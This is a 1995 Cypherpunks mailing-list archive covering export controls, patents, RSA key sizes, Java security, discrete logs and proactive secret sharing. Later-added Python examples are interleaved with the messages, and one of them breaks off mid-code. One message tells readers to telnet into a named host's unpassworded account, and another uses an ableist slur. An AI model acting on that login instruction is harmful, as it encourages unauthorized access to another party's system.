between an Act of Congress and a treaty, "the last expression of the
sovereign will must control."  The Chinese Exclusion Case, 130 U.S. 581
(1889).  

Treaties may still bind the U.S. internationally, putting the U.S. in
default.  But a U.S. person would not be able to enforce any treaty-based
claim if a later U.S. law conflicts, at least in a U.S. court.  

Lee

P.S.  I'm not aware of telecom treaties that would shield one from ITAR
violations, but would be interested to know of any.  I generally refrain
from public comment on ITAR because we are in litigation, as most of you
know.

Perry wrote:

>"Peter D. Junger" writes:
>> : I understand that you are a lawyer and I'm not, but it is my
>> : understanding that international treaties come in to play on this sort
>> : of thing. For instance, in international shipments, you can transship
>> : items and substances that are illegal to possess in a country through
>> : its ports provided that the materials do not originate or terminate
>> : their shipment in the country and remain sealed in their containers
>> : throughout. It is also my understanding that items like mail and phone
>> : calls that happen to transit a country are not necessarily subject to
>> : that nation's laws provided that the nation is not a terminal point for
>> : the mail or call or what have you.
>> 
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transshipments.
>
>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superseded by lower
>level laws, in spite of the supremacy clause of the constitution? That
>might be what the state department would tell you, but I'd have
>trouble believing even a lobotomized mongoloid judge would let that
>stand. Treaties are treaties, period.
>
>Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Mon, 13 Nov 1995 23:49:41 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: RE: POTP Security
Message-ID: <30A78DA4@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



> From: Paul Jackman <jacktech@delphi.com>
>Newsgroups: talk.politics.crypto
> Subject: Re: Elementrix One-Time Pad
>..
> The algorithm will be published when patent protection is assured.
> It is currently patent pending in several countries.

I saw that comment earlier.  It's rather a curious statement, given that the
rule of publication vs. patents is that publication before FILING kills
your ability to get the patent (in most countries) whereas publication
after filing but before grant is not an issue at all.  This explains why
you often see a mad scramble in companies when something
patentable is about to be announced at a trade show, or explained
in a white paper... the filing has to be in the mail before that happens.
But only just before... whether the patent office takes days or years
to grant the patent doesn't matter.

     paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 13 Nov 1995 20:09:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Market Value of Web Pages
In-Reply-To: <acc7f59c06021004e10b@[205.199.118.202]>
Message-ID: <199511130035.AA32505@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>If you toss arguments like this at some of the sites that would be viable for
>>the hit numbers and then explain the only way that will occur is if the crypto
>>laws are repealed, you will create a lot more lobbiers annoying their reps
>>for the cause. ecash without good crypto is like the Federal Reserve
>>delivering cash with open pickup trucks. Or doing credit card purchases on
>>postcards.
>
>And if you make arguments that this is easy to do, and add that crypto laws
>are stopping this from happening, you risk losing your credibility.
>
>The current crypto export laws are a pain, but are not stopping these
>"million hits a day" transactions. Recall that the 40 bits allowed in
>Netscape for export took some non-trivial number of machine-hours to crack
>(I'm talking about the brute force crack by Damien G. and others, not the
>more recent exploitation of the RNG weakness). While this brute force crack
>showed the limitations of the 40-bit key for certain transactions, it is
>not a viable attack on a single transaction whose value is pennies.

My point was (and I failed to mention it :) that to protect against stolen
funds you need to encrypt the transactions using strong crypto. Amongst US
jurisdictions this is possible so long as you license the technologies... so
be it. The Achilles heel for global secure business from the US is the ITAR
limitations. This weakens the crypto to levels that are breachable by quite
a lot of people.  As machines get faster and the ITAR laws keep the MTTB
(Mean Time To Break) down it will become more and more efficient to collect
and exploit electronic cash or credit cards.

In other words, if you want to run a trusted global electronic cash based
business then you need strong crypto otherwise someone will break your
transfers and therefore reputation and no one will want to do business with
you over the inet. At the very least it will cost you PR $ to curb any
damage done. Just ask Netscape.

You can live fine with the 250 million people in the US buying your product,
but with 5 billion potential users out there globally, (with various degrees
of connectivity), it makes sense to enable them to buy from you too.

Off topic:
Personally I don't see the relevance of ITAR and crypto any more. When was the
last time any one was prosecuted under its statutes? What is the point of
banning exportation of software which is widely available outside the US
anyway? It's idiocy. Any foreign power or cartel wanting secure comms is not
going to balk at using any method that can, irrespective of its legality
in the eyes of the US. With their resources they can construct secure OTP
systems by sending in people with a couple of "music CDs" in their briefcase.

Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 14 Nov 1995 00:19:42 +0800
To: daw@cs.berkeley.edu
Subject: Re: Diffie-Hellman in GF(2^n)?
In-Reply-To: <199511130525.VAA21438@comsec.com>
Message-ID: <9511131548.AA24703@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: David A Wagner <daw@CS.Berkeley.EDU>
>Date: Sun, 12 Nov 1995 14:43:53 -0800 (PST)


>``Hence the fields GF(2^n) ought to be avoided in all cryptographic
>applications.''

I wonder what this implies about elliptic curve applications over
GF(2^n)...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 14 Nov 1995 00:22:28 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
Message-ID: <9511131552.AA04995@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>1)  What is the key size used by the USA licensed version?

Charlie Kaufman goes into moderate detail on Lotus Notes'
encryption scheme in "Network Security: Private Communication
in a Public World"

Each user has both strong (~512 bit)  and weak (~400 bit)  RSA keys. 
These, and strong (64 bit) or weak (40 bit) symmetrical session keys 
are used depending on the  location of the users.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 14 Nov 1995 01:51:05 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <199511092241.OAA14102@jobe.shell.portal.com>
Message-ID: <199511131603.LAA21075@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Mon, 6 Nov 1995, Ray Cromwell wrote:
> 
> > > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> > > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> > > 
> > > >From the Java Web pages (as combined in Firewalls/BoS):
> > > 
> > > > The language's security features (not just applets):
> > 
> > [Long list of bullshit deleted]
> 
> I don't think that this is *bullshit* ... the questions I mean ... but,
> I for one am tired of people promoting products in a manner which flies 
> in direct contravention of expert consensus.

   Dr Cohen could have answered the questions himself if he had read
the literature. What he did was equivalent to asking "how secure is DES"
based on a marketing information flyer. Java does not fly in direct
contravention of expert consensus. Java does not purport to solve
the halting problem or formally prove the correctness of algorithms.
The only phrase you can quibble with is "tamper-free/virus-free",
but how many products on the market make that claim, for instance,
over-the-counter drugs? Anyone with half a brain knows that nothing
is perfectly secure, and what those phrases really mean is
"tamper-resistant". So get over it.

  It seems that after all those Netscape bugs were found, now folks,
many of whom I consider to not be very skilled in computer science,
are trying to conduct a witch hunt against Netscape, it seems in the
hope of gaining some fame or recognition. The general tone of your
messages and Dr Cohen's, leads me to believe that you think you are
conducting some service by "exposing" these "flaws", thinking that
one day c'punks will recognize your contribution and thank you. 
My guess is that most c'punks view your analysis as content free,
and overly zealous/hostile.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 13 Nov 1995 12:33:10 +0800
To: cypherpunks@toad.com
Subject: Re: Pegasus Mail 2.20
In-Reply-To: <199511090804.CAA20494@ion1.ionet.net>
Message-ID: <Pine.LNX.3.91.951113115956.13040D-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Scott Staedeli wrote:

[David Harris:]
[...]
> will define an open interface for third-party encryptors and it is then
> up to other people to write the code. What I envisage actually happening
> is people writing "shell interfaces" for WinPMail - i.e., modules that
> take the calls I make and translate them into calls to other programs,
> such as PGP or whatever, returning the result.

Is anybody currently writing modules for PGP (or, less trivially, for
MOSS, S/MIME etc.)? I've had a look at the interface and it doesn't seem
difficult, but why re-invent the wheel? :-)
The real question for PGP, actually, is which scheme should be supported
to achieve MIME compatibility among the several proposed in the IETF
drafts. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Tue, 14 Nov 1995 02:16:10 +0800
To: cypherpunks@toad.com
Subject: Re: The Crypto Applications we would rather not talk about
In-Reply-To: <199511131617.IAA28486@well.com>
Message-ID: <199511131737.MAA17729@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 13,  9:21, Lee Tien sent the following to the NSA's mail archives:
> Subject: Re: The Crypto Applications we would rather not talk about
|| 
|| Actually, the NYT Magazine did a cover story on pot growing within the last
|| year, and toward the end one of the Americans doing grow rooms in Holland
|| said specifically that he was looking toward anonymous electronic
|| communications as a way to control his grow rooms remotely and securely.
|| 

If the story were about how pot growers used locks on their doors to
keep people out, I doubt very many people would care.  The mere fact
that a computer is involved in some way turns on the hype buttons of many
journalists who would otherwise find the story unremarkable.

	David

-- 
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 14 Nov 1995 05:26:24 +0800
To: David A Wagner <cypherpunks@toad.com
Subject: Re: Diffie-Hellman in GF(2^n)?
In-Reply-To: <Pine.SUN.3.91.951112224949.24714A-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951113123310.24760A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote earlier:

> Thanks for the reference.  The paper gives a running time of exp(c(n 
> log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) 
> for discrete log in GF(2^n).  However, this paper was published in 1985. 
> There is now an algorithm to calculate discrete logs in GF(p) in
> exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same
> directory), so perhaps GF(2^n) isn't so bad after all. 

To clarify my earlier post, although both of the latter two algorithms
have a runtime of the form exp(c*n^(1/3)*(log n)^(2/3)), for GF(p)
c=1.922+o(1), for GF(2^n) c=1.405+o(1).  This seems to imply that if 
GF(2^n) is to be used, n needs to be 2.56*log p to achieve a comparable 
level of security to using GF(p).  (2.56=1.922^3/1.405^3)

Wei Dai
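
[Added example, not part of Wei Dai's message: the 2.56 factor follows from
equating only the n^(1/3) terms of the two running times. The Python below
solves the full expression exp(c*n^(1/3)*(log n)^(2/3)) for the matching
GF(2^n) size. It assumes natural logarithms, drops the o(1) terms, and reads n
as the same size measure in both formulas, as the message does; the function
names are this example's own.]

```python
import math

C_PRIME = 1.922   # constant quoted in the message for GF(p)
C_BINARY = 1.405  # constant quoted in the message for GF(2^n)


def log_work(n, c):
    """Natural log of the running time exp(c * n^(1/3) * (ln n)^(2/3))."""
    return c * n ** (1.0 / 3.0) * math.log(n) ** (2.0 / 3.0)


def leading_order_ratio():
    """Size multiplier when the (ln n)^(2/3) factor is ignored: (c_p / c_2)^3."""
    return (C_PRIME / C_BINARY) ** 3


def equivalent_size(n_prime, lo=2.0, hi=1e7, tol=1e-9):
    """Find n2 with log_work(n2, C_BINARY) == log_work(n_prime, C_PRIME).

    log_work is strictly increasing for n > 1, so bisection converges.
    """
    target = log_work(n_prime, C_PRIME)
    if not (log_work(lo, C_BINARY) < target < log_work(hi, C_BINARY)):
        raise ValueError("target work factor outside the search bracket")
    while hi - lo > tol:
        mid = (lo + hi) / 2.0
        if log_work(mid, C_BINARY) < target:
            lo = mid
        else:
            hi = mid
    return (lo + hi) / 2.0


def table(sizes):
    """Return (n for GF(p), matching n for GF(2^n), ratio) for each size."""
    rows = []
    for n_prime in sizes:
        n_binary = equivalent_size(n_prime)
        rows.append((n_prime, n_binary, n_binary / n_prime))
    return rows


if __name__ == "__main__":
    print("leading-order multiplier: %.3f" % leading_order_ratio())
    for n_prime, n_binary, ratio in table([512, 1024, 2048]):
        print("GF(p) n=%5d  ->  GF(2^n) n=%8.1f  (x%.3f)"
              % (n_prime, n_binary, ratio))
```

With the logarithmic factor included, the multiplier at these sizes comes out
below 2.56 and rises toward it as n grows.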




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 Nov 1995 04:21:41 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto - Proactive security plug
Message-ID: <acccdebc040210049a7f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 PM 11/13/95, Amir Herzberg wrote:
>A small note/plug: the schemes by Tim and Michael are based on `long lived'
>secret sharing, i.e. you trust each share of your secret to a server for a
>really long time. Some people may be concerned that such a long time would
>allow an attacker to break into most servers and reconstruct the secret (key).
>
>A solution to this is proactive secret sharing, as described in [HJKY95].
>In this protocol, the secret shares are periodically refreshed (i.e. new
>shares are computed distributively and then the old shares are erased).
>In this manner, an attacker has to break into most servers during the same
>period; shares from one period are worthless on the next period.
>
>Best, Amir
>
>[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jarecki,
>M. Yung, Crypto 95.

I also was sent a copy of Ron Rivest's latest paper on timed-release crypto
(also available at the URL http://theory.lcs.mit.edu/~rivest/).

These noted cryptographers, Amir, Ron, and others, are of course doing
"real cryptography" on this timed-released stuff....my speculations in '93
and later are informal, rough considerations. There are dangers in using
"common sense" in protocols like this, but, then, few of us have the time
to explore things in enough detail.

I just wanted to clarify things, though I suspect most of you know that
many of my arguments (and those of others, too) are based on informal, bull
session, sorts of foundations. This is often enough at a very early stage.
No substitute for much more rigorous, published-paper-quality analyses, of
course.

>> --Tim May
>>
>> Views here are not the views of my Internet Service Provider or Government.
>
>How do you know that?   :-)

In the past, I have actually gotten warning letters from some of my
Internet Service Providers saying that my views were inimical to their own
views. One provider, who shall remain nameless, actually *turned off* my
access to NetNews until I agreed to post a clarification that the views I
was expressing were not his views!

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 14 Nov 1995 05:57:26 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
In-Reply-To: <30A78DA4@mailer2>
Message-ID: <30A7B5A1.59C7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Koning 1695 wrote:
> 
> > From: Paul Jackman <jacktech@delphi.com>
> >Newsgroups: talk.politics.crypto
> > Subject: Re: Elementrix One-Time Pad
> >..
> > The algorithm will be published when patent protection is assured.
> > It is currently patent pending in several countries.
> 
> I saw that comment earlier.  It's rather a curious statement, given that the
> rule of publication vs. patents is that publication before FILING kills
> your ability to get the patent (in most countries) whereas publication
> after filing but before grant is not an issue at all.  This explains why
> you often see a mad scramble in companies when something
> patentable is about to be announced at a trade show, or explained
> in a white paper... the filing has to be in the mail before that happens.
> But only just before... whether the patent office takes days or years
> to grant the patent doesn't matter.

  I would guess that they are choosing to be cautious so that if their
patent is rejected they can still maintain it as a trade secret.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 14 Nov 1995 03:59:49 +0800
To: cypherpunks@toad.com
Subject: Re: unsuscribe all news groups
In-Reply-To: <199511131855.UAA00152@grumble.grondar.za>
Message-ID: <9511131928.AA21826@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Mary Rose wrote:
 > > I wish to unsuscribe ...
 > 
 > Please send a one line message ...


Hmm...  I was going to suggest asking Yvette.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Tue, 14 Nov 1995 03:12:17 +0800
To: cypherpunks@toad.com
Subject: New feature for the Cryptography Technical Report Server
Message-ID: <199511131840.NAA21640@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Yes, it's still there!  8-)  I posted a note to this list a few months ago
announcing that I had set up such a service, and though we've only got a 
few reports I'm up to a couple o' hundred visitors a week.  To me, the amount
of activity indicates interest in the subject, but the lack of reports
tells me that either authors are not interested in contributing, it's 
too difficult to contribute, or they don't know about the service.

I took some time this weekend and wrote a script to handle online submissions.
This should make things easier on the authors, I think.  If you have
a technical report, journal article or book you'd like to index in CTRS
(abstract only submissions are supported as well as full-text submission),
point your browser at:

	http://www.itribe.net/CTRS/add-entry.cgi

If you try this, please let me know how you liked it.  I'm interested in 
making the submissions process as painless as possible.  

As always, the main CTRS page is

	http://www.itribe.net/CTRS/
		or
	https://www.itribe.net/CTRS/



-- 
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 Nov 1995 05:07:15 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: "Not the views of my government"
Message-ID: <accce9d900021004d7ca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:16 PM 11/13/95, Brian Davis wrote:

>And, being personally familiar with the Government's position on many of
>the issues discussed here, I can certify that many/most/all of Tim's
>views are not the views of the United States government!


Indeed. Though many would argue that some (large) fraction of the views I
and others express are right in line with the views of the Founders.

Certainly Jefferson, Franklin, Henry, and others would be aghast at the
modern interpretations of the Constitution.

"What do you mean my inn may not allow smoking? Surely it is up to
customers to freely choose to enter my inn or not enter my inn."

"What do you mean I must hire fixed quotas of various ethnic and racial
groups, no matter my preferences?"

"How can the government command me to pay more for a worker than I wish to
freely pay?"

"Why are these things you call helicopters flying over my farm at all
hours? If they are looking for "illegal crops," why is this their concern?
Why do they subsidize tobacco production? Why is government paying farmers
to grow some crops and not to grow other crops?"

"What, pray tell, is this "key escrow" business? Do we no longer have
protections against unlawful search? Are our papers and conversations now
to be "escrowed" with the King's men? What country have I been brought back
into?"

"I am just an ignorant Founder; I know not the ways of your strange land."


--Timothy Jefferson May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Amir Herzberg <amir@watson.ibm.com>
Date: Tue, 14 Nov 1995 03:32:33 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Timed-release crypto - Proactive security plug
In-Reply-To: <v02120d01acc4eb3a6eb1@[199.0.65.105]>
Message-ID: <9511131904.AA21605@gimili.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



A small note/plug: the schemes by Tim and Michael are based on `long lived'
secret sharing, i.e. you trust each share of your secret to a server for a
really long time. Some people may be concerned that such a long time would
allow an attacker to break into most servers and reconstruct the secret (key).

A solution to this is proactive secret sharing, as described in [HJKY95].
In this protocol, the secret shares are periodically refreshed (i.e. new
shares are computed distributively and then the old shares are erased).
In this manner, an attacker has to break into most servers during the same
period; shares from one period are worthless on the next period.

Best, Amir

[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jarecki,
M. Yung, Crypto 95.

> At 12:09 AM 11/7/95, Michael Shields wrote:
>
> >In the May proposal, when you have a message to be encrypted, you
> >encrypt it with a session key, optionally split that key with an n-of-m
> >scheme, and then send the key into a network of escrow agents, which are
> >instructed to hold the message for a given period of time.  You then
> >hold onto the encrypted message, though you need not keep it secret.
> >Conceptually, you have encrypted a message and then remailed the key to
> >yourself in such a way that it will take X length of time to arrive.
>

> --Tim May
>
> Views here are not the views of my Internet Service Provider or Government.

How do you know that?   :-)
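
[Added example, not part of the original message and not code from the HJKY95
paper: Python showing the share refresh described above on top of Shamir
k-of-n sharing. It covers the refresh step only and assumes honest servers
with private channels between them, without the verification steps of the
full protocol; the field modulus, the function names and the 3-of-5
parameters are choices made for this example.]

```python
import secrets

P = 2**127 - 1  # prime modulus of the share field (chosen for this example)


def _eval(coeffs, x):
    """Evaluate a polynomial (coeffs[0] is the constant term) at x, mod P."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split(secret, k, n):
    """Shamir k-of-n split: return {server_id: share} for servers 1..n."""
    coeffs = [secret % P] + [secrets.randbelow(P) for _ in range(k - 1)]
    return {i: _eval(coeffs, i) for i in range(1, n + 1)}


def reconstruct(shares):
    """Lagrange-interpolate f(0) from {server_id: share} holding k shares."""
    total = 0
    for i, y in shares.items():
        num = den = 1
        for j in shares:
            if j != i:
                num = num * (-j) % P
                den = den * (i - j) % P
        total = (total + y * num * pow(den, -1, P)) % P
    return total


def refresh(shares, k):
    """One update period.

    Every server deals a random degree-(k-1) polynomial whose constant term
    is 0 and sends its value at j to server j. Each server adds what it
    receives to its old share; the old share is then discarded. The sum of
    the update polynomials is 0 at x = 0, so the shared secret is unchanged.
    """
    ids = list(shares)
    new = dict(shares)
    for _dealer in ids:
        delta = [0] + [secrets.randbelow(P) for _ in range(k - 1)]
        for j in ids:
            new[j] = (new[j] + _eval(delta, j)) % P
    return new


def take(shares, ids):
    """Select the shares held by the listed servers."""
    return {i: shares[i] for i in ids}


def demo():
    """3-of-5 sharing across two periods, plus a cross-period share mix."""
    secret = secrets.randbelow(P)
    k, n = 3, 5
    period1 = split(secret, k, n)
    period2 = refresh(period1, k)
    # Shares of servers 1 and 2 from period 1 combined with server 3's share
    # from period 2: k shares in total, but not from the same period.
    mixed = {**take(period1, [1, 2]), **take(period2, [3])}
    return {
        "period1_ok": reconstruct(take(period1, [1, 2, 3])) == secret,
        "period2_ok": reconstruct(take(period2, [2, 4, 5])) == secret,
        "mixed_ok": reconstruct(mixed) == secret,
        "shares_changed": all(period1[i] != period2[i] for i in period1),
    }


if __name__ == "__main__":
    print(demo())
```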





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Tue, 14 Nov 1995 07:23:56 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Credit Card security in the New York Times
Message-ID: <9511132213.AA19022@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


Today's New York Times has a nice article in the business section
about credit card security on the Internet. It's more of an editorial
than an article, but it's an editorial with the (IMNSHO) right spin:
shipping a credit card number over the Internet, even unencrypted, is
no less secure than giving it out over the phone.

The NYT has been doing a nice job covering computer issues in the past
few months, in Monday's business section. Worth reading if you
want to keep an eye on intelligent media coverage of the net.
-- 
                                __                      
nelson@santafe.edu              \/              http://www.santafe.edu/~nelson/
PGP key 9D719FAD   Fingerprint 3B 9B 8E 58 1C 90 57 3E  B7 99 ED 13 65 2E 0B 24




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 14 Nov 1995 04:52:58 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Timed-release crypto - Proactive security plug
In-Reply-To: <acccdebc040210049a7f@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.951113151455.7281B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Nov 1995, Timothy C. May wrote:

> At 7:03 PM 11/13/95, Amir Herzberg wrote:
>  ... 
> >> --Tim May
> >>
> >> Views here are not the views of my Internet Service Provider or Government.
> >
> >How do you know that?   :-)
> 
> In the past, I have actually gotten warning letters from some of my
> Internet Service Providers saying that my views were inimical to their own
> views. One provider, who shall remain nameless, actually *turned off* my
> access to NetNews until I agreed to post a clarification that the views I
> was expressing were not his views!
> 
And, being personally familiar with the Government's position on many of
the issues discussed here, I can certify that many/most/all of Tim's 
views are not the views of the United States government!

EBD

> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Tue, 14 Nov 1995 06:12:04 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Tenticle: Yvette and unsuscribe all news groups
In-Reply-To: <9511131928.AA21826@alpha>
Message-ID: <9511132140.AA22158@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Mary Rose wrote:
>  > > I wish to unsuscribe ...
>  > 
>  > Please send a one line message ...
> 
> 
> Hmm...  I was going to suggest asking Yvette.
> 

Hmm.. the tentacle has been sending me death threats; this
tentacle has a difficult time spelling "killed" correctly.

Instructions for creating your own tentacle:

telnet to vabeach.email.net and try to log into the unpassworded
account 'mm'.  This was obviously a BBS to increase the sysop's
chances for landing a human date.  Hmmmm...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Tue, 14 Nov 1995 05:31:38 +0800
To: amir@watson.ibm.com (Amir Herzberg)
Subject: Re: Timed-release crypto - Proactive security plug
In-Reply-To: <9511131904.AA21605@gimili.watson.ibm.com>
Message-ID: <199511132053.PAA01851@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


[...]

> A solution to this is proactive secret sharing, as described in [HJKY95].
> In this protocol, the secret shares are periodically refreshed (i.e. new
> shares are computed distributively and then the old shares are erased).
> In this manner, an attacker has to break into most servers during the same
> period; shares from one period are worthless on the next period.
> 
> Best, Amir
> 
> [HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jarecki,
> M. Yung, Crypto 95.

[...]

Here is an example of _dynamics_ being used to increase the security of
a logical protocol.  I believe that dynamics may be usable at a more micro
level to build a physical device that is expensive to compromise...
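
[Added example, not part of the original message and not code from the cited paper.] The share refresh quoted above can be sketched with Shamir sharing over a prime field: every server deals a random polynomial with constant term 0, each server adds the sub-shares it receives to its old share, and the old share is erased. The field prime, the function names and the honest-server assumption (dealt sub-shares are not verified) are choices made for this illustration.

```python
import secrets

# Assumption for this sketch: a fixed Mersenne prime as the share field.
P = 2**127 - 1


def _eval_poly(coeffs, x):
    """Evaluate a polynomial (constant term first) at x, modulo P."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split(secret, k, n):
    """Shamir-share `secret` among servers 1..n; any k shares reconstruct it."""
    if not 2 <= k <= n:
        raise ValueError("need 2 <= k <= n")
    coeffs = [secret % P] + [secrets.randbelow(P) for _ in range(k - 1)]
    return {i: _eval_poly(coeffs, i) for i in range(1, n + 1)}


def reconstruct(shares):
    """Lagrange-interpolate the sharing polynomial at x = 0."""
    secret = 0
    for i, y_i in shares.items():
        num, den = 1, 1
        for j in shares:
            if j != i:
                num = (num * -j) % P
                den = (den * (i - j)) % P
        secret = (secret + y_i * num * pow(den, -1, P)) % P
    return secret


def refresh(shares, k):
    """Run one refresh period and return the new shares.

    Every server acts as a dealer of a random degree-(k-1) polynomial whose
    constant term is 0, so the sum of all updates leaves the secret unchanged
    while re-randomising every share. In a deployment each dealer would send
    delta(j) privately to server j; here all servers are simulated in-process.
    """
    servers = list(shares)
    updates = {j: 0 for j in servers}
    for _dealer in servers:
        delta = [0] + [secrets.randbelow(P) for _ in range(k - 1)]
        for j in servers:
            updates[j] = (updates[j] + _eval_poly(delta, j)) % P
    # The caller is expected to discard (erase) the old `shares` dict.
    return {j: (shares[j] + updates[j]) % P for j in servers}


def demo():
    """3-of-5 sharing of a constructed secret across two periods."""
    secret = 0x1995CAFE  # constructed sample value
    k, n = 3, 5
    period1 = split(secret, k, n)
    period2 = refresh(period1, k)

    def take(shares, ids):
        return {i: shares[i] for i in ids}

    return {
        # Any k shares from the same period recover the secret.
        "period1_ok": reconstruct(take(period1, [1, 2, 3])) == secret,
        "period2_ok": reconstruct(take(period2, [2, 4, 5])) == secret,
        # Two shares stolen in period 1 plus one stolen in period 2 do not.
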